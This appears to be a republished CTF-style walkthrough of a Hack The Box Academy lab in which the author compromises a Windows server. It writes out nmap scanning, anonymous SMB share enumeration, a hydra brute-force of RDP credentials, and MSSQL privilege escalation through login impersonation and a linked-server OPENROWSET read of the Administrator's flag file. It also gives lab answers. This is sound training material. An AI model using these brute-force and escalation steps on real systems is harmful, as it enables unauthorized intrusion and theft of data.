██FR█████ █INTELL███████████

HTB Academy: Attacking Common Services – Hard Lab


This content originally appeared on DEV Community and was authored by Sara Mazal M.

Image description

In this lab, we are tasked with compromising a third internal server within the inlanefreight.htb domain. This server is used to manage files and working materials, such as forms, and it also hosts a database whose purpose is not immediately clear. Our objective is to gain administrative privileges by exploiting vulnerabilities in the server’s configuration.

Objectives

  1. Identify a file belonging to the user “Simon.” (Format: filename.txt)
  2. Enumerate the target and discover a password for the user Fiona.
  3. Once logged in, identify another user we can compromise to escalate privileges and gain administrative access.

Steps to Solution

1. Network and Service Enumeration

First, we perform a comprehensive network scan using nmap to identify open ports and running services:

nmap -sV -sC -p- $TARGET_IP

Results:

3389/tcp open  ms-wbt-server Microsoft Terminal Services (RDP)
1433/tcp open  ms-sql-s (SQL)
135/tcp  open  msrpc         (Microsoft Windows RPC)
445/tcp  open  microsoft-ds? (SMB)

2. SMB Enumeration

To explore the SMB shares available on the target, we use smbclient:

smbclient -N -L //10.129.203.10/

Results:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Home            Disk
IPC$            IPC       Remote IPC

Next, we list the contents of the Home share:

smbclient //10.129.203.10/Home
Password for [WORKGROUP\htb-ac-552074]:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> ls
  .                                   D        0  Thu Apr 21 16:18:21 2022
  ..                                  D        0  Thu Apr 21 16:18:21 2022
  HR                                  D        0  Thu Apr 21 15:04:39 2022
  IT                                  D        0  Thu Apr 21 15:11:44 2022
  OPS                                 D        0  Thu Apr 21 15:05:10 2022
  Projects                            D        0  Thu Apr 21 15:04:48 2022

\HR
  .                                   D        0  Thu Apr 21 15:04:39 2022
  ..                                  D        0  Thu Apr 21 15:04:39 2022

\IT
  .                                   D        0  Thu Apr 21 15:11:44 2022
  ..                                  D        0  Thu Apr 21 15:11:44 2022
  Fiona                               D        0  Thu Apr 21 15:11:53 2022
  John                                D        0  Thu Apr 21 16:15:09 2022
  Simon                               D        0  Thu Apr 21 16:16:07 2022

\OPS
  .                                   D        0  Thu Apr 21 15:05:10 2022
  ..                                  D        0  Thu Apr 21 15:05:10 2022

\Projects
  .                                   D        0  Thu Apr 21 15:04:48 2022
  ..                                  D        0  Thu Apr 21 15:04:48 2022

\IT\Fiona
  .                                   D        0  Thu Apr 21 15:11:53 2022
  ..                                  D        0  Thu Apr 21 15:11:53 2022
  creds.txt                           A      118  Thu Apr 21 15:13:11 2022

\IT\John
  .                                   D        0  Thu Apr 21 16:15:09 2022
  ..                                  D        0  Thu Apr 21 16:15:09 2022
  information.txt                     A      101  Thu Apr 21 16:14:58 2022
  notes.txt                           A      164  Thu Apr 21 16:13:40 2022
  secrets.txt                         A       99  Thu Apr 21 16:15:55 2022

\IT\Simon
  .                                   D        0  Thu Apr 21 16:16:07 2022
  ..                                  D        0  Thu Apr 21 16:16:07 2022
  random.txt                          A       94  Thu Apr 21 16:16:48 2022

        7706623 blocks of size 4096. 3165043 blocks available
smb: \>

Answer 1: random.txt

3. Password Discovery

Using the hydra tool, we brute-force the Remote Desktop Protocol (RDP) service to discover the password for the user Fiona:

hydra -l Fiona -P XXXXX.txt 10.129.xxx.xx rdp

Result:

[3389][rdp] host: 10.129.xxx.xx   login: Fiona   password: $PASSWORD

4. Remote Desktop Access

With the credentials obtained, we establish an RDP connection:

rdesktop -u Fiona -p '$PASSWORD' $TARGET_IP

5. SQL Server Enumeration and Privilege Escalation

Once connected, we use sqlcmd to enumerate SQL Server tables and execute commands to escalate privileges:

PS C:\Users\Fiona> sqlcmd

1> SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES;
2> go

To escalate privileges, we execute commands as another user and check server roles:

EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
go

Finally, to gather more information about the linked servers and their configuration:

SELECT srvname, isremote FROM sysservers;
go
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [local.test.linked.srv];
go
execute ('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
go

HTB{46u$**********_$3rv3r$}

By systematically enumerating services, discovering valid credentials, and leveraging SQL Server commands, we were able to compromise multiple user accounts, ultimately gaining administrative access to the server. The contents of the flag.txt file were retrieved from the Administrator’s desktop, completing the task.

HAPPY HACKING!

Subscribe! To Get More HTB Cubes ->
Image description

My HTB BADGE


This content originally appeared on DEV Community and was authored by Sara Mazal M.